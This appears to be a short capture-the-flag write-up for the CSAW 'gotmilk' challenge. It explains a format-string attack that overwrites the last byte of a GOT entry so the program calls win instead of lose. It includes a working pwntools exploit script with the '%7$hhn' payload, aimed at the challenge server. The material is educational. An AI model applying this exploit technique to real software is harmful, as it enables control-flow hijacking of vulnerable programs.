Change lose@got address's least significant byte to match win@got address's least significant byte.

If you check the libmylib.so file, you will see that only the last byte differs.

The other way to verify it is to leak lose@got's address a bunch of times using `<lose_got_addr>%7$s` and you will also see the last byte remains constant.

#!/usr/bin/env python2

from pwn import *

elf = ELF('./gotmilk')
p = remote('pwn.chal.csaw.io', 1004)

lose_got = elf.got['lose']

log.info('lose@got: ' + hex(lose_got))

payload = p32(lose_got)
payload += '%133c%7$hhn' # Writes 0x89 to the last byte of lose@got, effectively changing it to win's address from libmylib.so

p.sendlineafter('? ', payload)


Original writeup (https://syedfarazabrar.com/).